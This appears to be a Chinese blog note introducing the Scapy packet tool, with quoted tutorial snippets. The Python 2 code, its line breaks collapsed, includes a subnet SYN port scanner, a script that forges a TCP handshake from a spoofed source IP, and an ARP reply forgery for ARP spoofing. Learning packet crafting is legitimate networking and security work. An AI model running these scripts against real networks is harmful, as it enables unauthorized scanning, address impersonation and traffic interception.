作者介绍,这是个万能的网络工具,除了可以查看 TCP/IP 各层的报文,还可以发送报文。可以说是一个万能工具,作者嚣张的说, “it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.”。
项目地址:http://www.secdev.org/projects/scapy/
这里只是做一个简单的备份,以后有用再做了解。
下面是一个例子,摘自文档《Ruling the Network with Python》:
#!/usr/bin/env python import sys from scapy import * conf.verb=0 if len(sys.argv) != 2: print "Usage: ./pscan.py <target>" sys.exit(1) target=sys.argv[1] p=IP(dst=target)/TCP(dport=80, flags="S") ans,unans=sr(p, timeout=9) for a in ans: if a[1].flags == 2: print a[1].src
效果是对 IP 段进行 80 端口扫描:
detach@luna:~/lab/scapy-0.9.17$ sudo ./pscan.py 192.168.9.0/24 192.168.9.1 192.168.9.2 192.168.9.11 192.168.9.14
还有这个,伪装 IP,给远端地址 TCP 报文(路由器只检查目的地址是否在自己“派送”范围),注意,目的地址不能是本地 IP:
#!/usr/bin/env python import sys from scapy import * conf.verb=0 if len(sys.argv) != 4: print "Usage: ./spoof.py <target> <spoofed_ip> <port>" sys.exit(1) target = sys.argv[1] spoofed_ip = sys.argv[2] port = int(sys.argv[3]) p1=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='S') send(p1) print "Okay, SYN sent. Enter the sniffed sequence number now: " seq=sys.stdin.readline() print "Okay, using sequence number " + seq seq=int(seq[:-1]) p2=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='A',ack=seq+1,seq=1) send(p2) print "Okay, final ACK sent. Check netstat on your target :-)"
或许你还用得到 ARP 欺骗:
p = ARP() p.op = 2 p.hwsrc = "00:11:22:aa:bb:cc" p.psrc = spoofed_ip p.hwdst = "ff:ff:ff:ff:ff:ff" p.pdst = target send(p)